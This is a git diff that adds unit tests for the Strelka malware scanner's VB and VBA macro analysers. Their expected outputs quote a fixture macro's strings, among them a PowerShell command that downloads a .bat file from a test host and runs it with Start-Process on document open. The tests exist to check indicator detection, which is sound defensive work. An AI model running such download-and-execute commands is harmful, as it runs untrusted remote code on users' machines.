mock.ANY, "flags": [], - "urls": [ - b"http://foobar.example.com", - b"ftp://barfoo.example.com", - b"example.com", - b"https://barfoo.example.com", - ], + "urls": unordered( + [ + "example.com", + "http://foobar.example.com", + "https://barfoo.example.com", + "ftp://barfoo.example.com", + ] + ), } scanner_event = run_test_scan( @@ -41,7 +45,7 @@ def test_scan_url_html(mocker): test_scan_event = { "elapsed": mock.ANY, "flags": [], - "urls": [b"https://example.com/example.js"], + "urls": ["https://example.com/example.js"], } scanner_event = run_test_scan( diff --git a/src/python/strelka/tests/test_scan_vb.py b/src/python/strelka/tests/test_scan_vb.py new file mode 100644 index 00000000..9058d857 --- /dev/null +++ b/src/python/strelka/tests/test_scan_vb.py @@ -0,0 +1,90 @@ +from pathlib import Path +from unittest import TestCase, mock + +from pytest_unordered import unordered + +from strelka.scanners.scan_vb import ScanVb as ScanUnderTest +from strelka.tests import run_test_scan + + +def test_scan_vb(mocker): + """ + Pass: Sample event matches output of scanner. + Failure: Unable to load file or sample event fails to match. + """ + test_scan_event = { + "elapsed": mock.ANY, + "flags": [], + "comments": ["AutoOpen Macro"], + "functions": ["AutoOpen", "Document_Open", "Testing_Iocs"], + "names": [ + "Explicit", + "MsgBox", + "objWMIService", + "GetObject", + "objStartup", + "Get", + "objConfig", + "SpawnInstance_", + "ShowWindow", + "objProcess", + "ExecuteCmdAsync", + ], + "operators": ["="], + "strings": [ + "Hello World!", + "winmgmts:\\\\\\\\.\\\\root\\\\cimv2", + "Win32_ProcessStartup", + "winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_Process", + "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\\\\test.txt\\nStart-Process -Filepath $env:tmp\\\\invoice.one", + "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\\\\test.bat\\nStart-Process -Filepath $env:tmp\\\\test.bat", + ], + "script_length_bytes": 752, + "tokens": [ + "Token.Keyword", + "Token.Name", + "Token.Text.Whitespace", + "Token.Name.Function", + "Token.Punctuation", + "Token.Comment", + "Token.Literal.String", + "Token.Operator", + "Token.Literal.Number.Integer", + ], + "urls": unordered( + [ + "tmp\\\\invoice.one", + "https://www.test.com/test.bat", + "https://www.test.example.com", + ] + ), + "iocs": unordered( + [ + { + "ioc": "www.test.example.com", + "ioc_type": "domain", + "scanner": "ScanVb", + }, + { + "ioc": "https://www.test.example.com", + "ioc_type": "url", + "scanner": "ScanVb", + }, + {"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVb"}, + { + "ioc": "https://www.test.com/test.bat", + "ioc_type": "url", + "scanner": "ScanVb", + }, + ] + ), + } + + scanner_event = run_test_scan( + mocker=mocker, + scan_class=ScanUnderTest, + fixture_path=Path(__file__).parent / "fixtures/test.vba", + ) + + TestCase.maxDiff = None + TestCase().assertDictEqual(test_scan_event, scanner_event) diff --git a/src/python/strelka/tests/test_scan_vba.py b/src/python/strelka/tests/test_scan_vba.py new file mode 100644 index 00000000..0a810f91 --- /dev/null +++ b/src/python/strelka/tests/test_scan_vba.py @@ -0,0 +1,59 @@ +from pathlib import Path +from unittest import TestCase, mock + +from pytest_unordered import unordered + +from strelka.scanners.scan_vba import ScanVba as ScanUnderTest +from strelka.tests import run_test_scan + + +def test_scan_vba(mocker): + """ + Pass: Sample event matches output of scanner. + Failure: Unable to load file or sample event fails to match. + """ + test_scan_event = { + "elapsed": mock.ANY, + "flags": [], + "auto_exec": ["AutoOpen", "Document_Open"], + "base64": [], + "dridex": [], + "hex": [], + "ioc": [ + "https://www.test.example.com", + "https://www.test.com/test.bat", + "test.bat", + ], + "iocs": unordered( + [ + {"ioc": "test.bat", "ioc_type": "domain", "scanner": "ScanVba"}, + { + "ioc": "www.test.example.com", + "ioc_type": "domain", + "scanner": "ScanVba", + }, + { + "ioc": "https://www.test.example.com", + "ioc_type": "url", + "scanner": "ScanVba", + }, + {"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVba"}, + { + "ioc": "https://www.test.com/test.bat", + "ioc_type": "url", + "scanner": "ScanVba", + }, + ] + ), + "suspicious": ["powershell", "Start-Process", "ShowWindow", "GetObject"], + "total": {"extracted": 1, "files": 1}, + } + + scanner_event = run_test_scan( + mocker=mocker, + scan_class=ScanUnderTest, + fixture_path=Path(__file__).parent / "fixtures/test.vba", + ) + + TestCase.maxDiff = None + TestCase().assertDictEqual(test_scan_event, scanner_event)